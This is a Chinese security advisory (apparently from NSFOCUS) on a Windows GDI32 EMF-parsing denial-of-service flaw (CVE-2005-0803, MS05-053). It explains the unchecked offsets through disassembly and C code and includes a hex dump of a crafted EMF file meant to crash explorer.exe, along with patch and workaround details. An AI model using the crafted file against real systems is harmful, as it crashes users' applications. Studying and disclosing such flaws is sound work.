安全研究
安全漏洞
Microsoft Windows图形设备接口库拒绝服务漏洞(MS05-053)
发布日期:2005-03-18
更新日期:2005-11-09
受影响系统:
Microsoft Windows XP SP1不受影响系统:
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
Microsoft Windows XP SP2描述:
Microsoft Windows Server 2003 SP1
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
BUGTRAQ ID: 12834
CVE(CAN) ID: CVE-2005-0803
Microsoft Windows 是微软推出的用途非常广泛的操作系统。
Windows的GDI32.DLL GetEnhMetaFilePaletteEntries() API不能正确的处理EMF文件,导致调用API的应用程序在读取某些特制的EMF文件时可能崩溃。
有漏洞的代码如下:
----------------------------------------------------------
反编译的GDI32.GetEnhMetaFilePaletteEntries()
----------------------------------------------------------
77F68CC7 PUSH ESI
77F68CC8 PUSH EDI
77F68CC9 PUSH 460000
77F68CCE PUSH DWORD PTR SS:[ESP+10]
77F68CD2 CALL GDI32.77F48A89
77F68CD7 TEST EAX,EAX
77F68CD9 JNZ SHORT GDI32.77F68CE0
77F68CDB OR EAX,FFFFFFFF
77F68CDE JMP SHORT GDI32.77F68D11
77F68CE0 MOV EDI,DWORD PTR SS:[ESP+14]
77F68CE4 TEST EDI,EDI
77F68CE6 JNZ SHORT GDI32.77F68CF0
77F68CE8 MOV EAX,DWORD PTR DS:[EAX+C]
77F68CEB MOV EAX,DWORD PTR DS:[EAX+44]
77F68CEE JMP SHORT GDI32.77F68D11
77F68CF0 MOV ECX,DWORD PTR DS:[EAX+C]
77F68CF3 MOV EAX,DWORD PTR DS:[ECX+44]
77F68CF6 CMP DWORD PTR SS:[ESP+10],EAX
77F68CFA JNB SHORT GDI32.77F68D00
77F68CFC MOV EAX,DWORD PTR SS:[ESP+10]
77F68D00 MOV EDX,DWORD PTR DS:[ECX+30]
77F68D03 ADD EDX,ECX
77F68D05 MOV ECX,EAX
77F68D07 SUB EDX,DWORD PTR DS:[EDX-4]
77F68D0A MOV ESI,DWORD PTR DS:[EDX+C]
77F68D0D ADD ESI,EDX
77F68D0F REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
77F68D11 POP EDI
77F68D12 POP ESI
77F68D13 RETN 0C
-----------------------------------------------------------
翻译为C代码
-----------------------------------------------------------
UINT GetEnhMetaFilePaletteEntries(
HENHMETAFILE hemf, // handle of enhanced metafile
UINT cEntries, // count of palette entries
LPPALETTEENTRY lppe // address of palette-entry array
)
{
char *begin, *end, *emreof, *palent;
DWORD count, i;
// ......
begin = emf file offset in memory;
// get the count of palette entries from the emf file
count = *((DWORD *)(begin + 0x44));
if (lppe == 0)
return count;
if (size > count)
size = count;
// find the end of the emf file
end = begin + *((DWORD *)(bigin + 0x30));
// find the offset of emreof
emreof = end - *((DWORD *)(end - 0x04));
// find the offset of palentries
palent = emreof + *((DWORD *)(emreof + 0x0c));
// copy the palent from the file to palette-entry array
for (i = 0; i < size; i++)
memcpy(lppe + i, palent + i * 4, 4);
return size;
}
-----------------------------------------------------------
可见没有有效性检查,因此可能在使用从EMF读取的偏移值(end,emreof,palent)时导致访问破坏。
这个漏洞的具体影响取决于使用API的应用程序。一般来讲,如果EMRHEAD->nPalEntries中存在非0的值,应用程序就会调用这个API,并向第二个参数传送EMRHEAD->nPalEntries。如果特制的EMF所访问的地址无效的话,就会导致应用程序崩溃。
<*来源:Hongzhen Zhou (felix__zhou@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111108743527497&w=2
http://www.microsoft.com/technet/security/Bulletin/MS05-053.mspx
http://www.us-cert.gov/cas/techalerts/TA05-312A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
-------------------------------------------------------
0000000 01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00
0000010 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00
0000020 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00
0000030 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00
0000040 64 00 00 00 41 00 00 00 c8 12 00 00 c2 1a 00 00
0000050 cc 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00
0000060 00 00 00 00 0e 00 00 00 14 00 00 00 41 00 00 00
0000070 41 42 43 44 00 00 01 ff
-------------------------------------------------------
如果无法导致explorer.exe崩溃的话,请更改最后8个字节的值,然后重新测试。
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 如果您使用的是Outlook 2002或更高版本,请用纯文本格式阅读电子邮件以帮助保护自己免受来自HTML电子邮件攻击媒介的攻击。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS05-053)以及相应补丁:
MS05-053:Vulnerabilities in Graphics Rendering Engine Could Allow Code Execution (896424)
链接:http://www.microsoft.com/technet/security/Bulletin/MS05-053.mspx
浏览次数:4540
严重程度:13(网友投票)
绿盟科技给您安全的保障